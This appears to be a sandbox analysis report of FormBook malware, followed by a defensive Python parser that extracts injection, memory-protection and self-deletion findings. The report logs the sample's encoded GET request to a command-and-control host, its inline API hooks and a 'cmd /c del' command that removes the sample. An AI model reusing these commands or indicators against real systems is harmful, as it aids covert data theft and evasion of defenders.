Data Ascii: <!doctype html><html><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no"><title>404</title><style>body{background-color:#444;font-size:14px;}h3{font-size:60px;color:#eee;text-align:center;padding-top:30px;font-weight:normal;}</style></head><body><h3>404!</h3></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49753 | 111.221.46.49 | 80 | C:\Windows\explorer.exe
Timestamp | kBytes transferred | Direction | Data
Feb 23, 2021 15:32:44.386287928 CET | 6388 | OUT | GET /rcv/?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk HTTP/1.1
Host: www.tabandolano.online
Connection: close
Data Raw: 00 00 00 00 00 00 00
Data Ascii:
Feb 23, 2021 15:32:44.603816986 CET | 6388 | IN | HTTP/1.1 302 Found
Date: Tue, 23 Feb 2021 14:32:44 GMT
Server: Apache
Location: http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&jL08l2=WXL00450GFoHk
Content-Length: 346
Connection: close
Content-Type: text/html; charset=iso-8859-1
Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 74 61 62 61 6e 64 6f 6c 61 6e 6f 2e 6f 6e 6c 69 6e 65 2f 63 67 69 2d 73 79 73 2f 73 75 73 70 65 6e 64 65 64 70 61 67 65 2e 63 67 69 3f 56 52 4e 68 3d 43 73 6b 34 67 69 30 41 32 74 65 4f 48 63 68 4e 78 6c 48 6d 66 6b 33 73 5a 6b 4e 55 57 48 53 68 6b 54 36 44 73 4e 76 45 62 4f 65 43 49 36 47 39 44 47 64 31 6a 6a 52 79 4a 32 73 49 5a 33 72 51 44 6a 57 57 7a 55 77 79 62 77 3d 3d 26 61 6d 70 3b 6a 4c 30 38 6c 32 3d 57 58 4c 30 30 34 35 30 47 46 6f 48 6b 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>302 Found</title></head><body><h1>Found</h1><p>The document has moved <a href="http://www.tabandolano.online/cgi-sys/suspendedpage.cgi?VRNh=Csk4gi0A2teOHchNxlHmfk3sZkNUWHShkT6DsNvEbOeCI6G9DGd1jjRyJ2sIZ3rQDjWWzUwybw==&amp;jL08l2=WXL00450GFoHk">here</a>.</p></body></html>


Code Manipulations

User Modules

Hook Summary

Function Name | Hook Type | Active in Processes
PeekMessageA | INLINE | explorer.exe
PeekMessageW | INLINE | explorer.exe
GetMessageW | INLINE | explorer.exe
GetMessageA | INLINE | explorer.exe

Processes

Process: explorer.exe, Module: user32.dll
Function Name | Hook Type | New Data
PeekMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEA
PeekMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEA
GetMessageW | INLINE | 0x48 0x8B 0xB8 0x85 0x5E 0xEA
GetMessageA | INLINE | 0x48 0x8B 0xB8 0x8D 0xDE 0xEA

Statistics

Behavior


System Behavior

General

Start time: 15:30:48
Start date: 23/02/2021
Path: C:\Users\user\Desktop\cryptedprof.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\cryptedprof.exe'
Imagebase: 0x400000
File size: 339210 bytes
MD5 hash: 72EFE20E4A59AE2722383B8786956994
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.335904498.0000000002A60000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:30:48
Start date: 23/02/2021
Path: C:\Users\user\Desktop\cryptedprof.exe
Wow64 process (32bit): true
Commandline: 'C:\Users\user\Desktop\cryptedprof.exe'
Imagebase: 0x400000
File size: 339210 bytes
MD5 hash: 72EFE20E4A59AE2722383B8786956994
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000001.332707459.0000000000400000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388099224.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388332854.00000000009F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000003.00000002.388307234.00000000009C0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: low

General

Start time: 15:30:54
Start date: 23/02/2021
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:
Imagebase: 0x7ff6f22f0000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:31:15
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\msdt.exe
Imagebase: 0x180000
File size: 1508352 bytes
MD5 hash: 7F0C51DBA69B9DE5DDF6AA04CE3A69F4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Joe Security
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
Reputation: moderate

General

Start time: 15:31:19
Start date: 23/02/2021
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\cryptedprof.exe'
Imagebase: 0x2a0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

General

Start time: 15:31:19
Start date: 23/02/2021
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff61de10000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

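The process records above tell the FormBook story in three facts: the malware's Yara rules fire inside the memory of a Windows system binary (msdt.exe, a 32-bit process launched after explorer.exe), the hits sit in regions whose dump name carries protection 0x40 (PAGE_EXECUTE_READWRITE, i.e. unpacked code rather than a mapped image), and a cmd.exe child deletes the original sample. The following Python is an added example, not part of the Joe Sandbox report: it parses records in the "General" / key: value layout used on this page and extracts those three findings. The embedded record text is an abridged copy of the explorer.exe, msdt.exe and cmd.exe entries, and the field layout of the .sdmp name (<pid>.<round>.<id>.<base>.<protection>.<type>) is an assumption.

```python
import re
from dataclasses import dataclass, field

# Constructed input: an abridged copy of three process records from this report.
REPORT = r"""
General

Start time: 15:30:54
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline:

General

Start time: 15:31:15
Path: C:\Windows\SysWOW64\msdt.exe
Wow64 process (32bit): true
Commandline: C:\Windows\SysWOW64\msdt.exe
Yara matches:
• Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.591652804.0000000002C60000.00000040.00000001.sdmp, Author: Joe Security
• Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.590578068.00000000003D0000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group

General

Start time: 15:31:19
Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del 'C:\Users\user\Desktop\cryptedprof.exe'
"""

# Assumed layout of a sandbox dump name:
#   <pid>.<dump round>.<id>.<base address>.<page protection>.<region type>.sdmp
SDMP_RE = re.compile(
    r"(?P<pid>[0-9A-Fa-f]{8})\.(?P<round>[0-9A-Fa-f]{8})\.(?P<uid>\d+)\."
    r"(?P<base>[0-9A-Fa-f]{16})\.(?P<prot>[0-9A-Fa-f]{8})\.(?P<rtype>[0-9A-Fa-f]{8})\.sdmp"
)
YARA_RE = re.compile(
    r"Rule: (?P<rule>[^,]+), Description: (?P<desc>[^,]+), "
    r"Source: (?P<src>[^,]+), Author: (?P<author>.+)"
)
SELF_DELETE_RE = re.compile(r"/c\s+del\s+'?(?P<target>[^']+?)'?\s*$", re.IGNORECASE)

PAGE_EXECUTE_READWRITE = 0x40  # Windows page-protection constant


@dataclass
class YaraHit:
    rule: str
    pid: int
    base: int
    protect: int


@dataclass
class Proc:
    fields: dict = field(default_factory=dict)
    hits: list = field(default_factory=list)


def parse_report(text: str) -> list:
    """One Proc per 'General' block; Yara bullet lines become YaraHit entries."""
    procs, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "General":
            cur = Proc()
            procs.append(cur)
            continue
        if cur is None:
            continue
        if line.startswith("•"):
            m = YARA_RE.search(line)
            s = SDMP_RE.search(m.group("src")) if m else None
            if s:
                cur.hits.append(YaraHit(m.group("rule").strip(), int(s["pid"], 16),
                                        int(s["base"], 16), int(s["prot"], 16)))
            continue
        key, _, value = line.partition(":")    # first colon only, so that
        cur.fields[key.strip()] = value.strip()  # C:\... paths stay intact
    return procs


def injected_system_processes(procs: list) -> list:
    """Windows binaries with malware Yara hits in their memory: injection targets."""
    return sorted({p.fields.get("Path", "") for p in procs
                   if p.hits and p.fields.get("Path", "").lower().startswith("c:\\windows\\")})


def rwx_hits(procs: list) -> list:
    """Hits inside PAGE_EXECUTE_READWRITE regions: unpacked code, not a mapped image."""
    return [(p.fields.get("Path", ""), h.rule, hex(h.base))
            for p in procs for h in p.hits if h.protect == PAGE_EXECUTE_READWRITE]


def self_delete_targets(procs: list) -> list:
    """Files removed by a 'cmd.exe /c del ...' child: the dropper covering its tracks."""
    out = []
    for p in procs:
        if p.fields.get("Path", "").lower().endswith("\\cmd.exe"):
            m = SELF_DELETE_RE.search(p.fields.get("Commandline", ""))
            if m:
                out.append(m.group("target"))
    return out


if __name__ == "__main__":
    procs = parse_report(REPORT)
    print("injected:", injected_system_processes(procs))
    print("RWX hits:", rwx_hits(procs))
    print("deleted: ", self_delete_targets(procs))
```

The 0x3D0000 hit in msdt.exe carries protection 0x04 (PAGE_READWRITE) and is therefore left out of the RWX list; only the 0x2C60000 region, where the unpacked FormBook code executes, is reported. The records carry no parent PID, so parent-child linkage has to come from the process tree elsewhere in the report, not from these blocks.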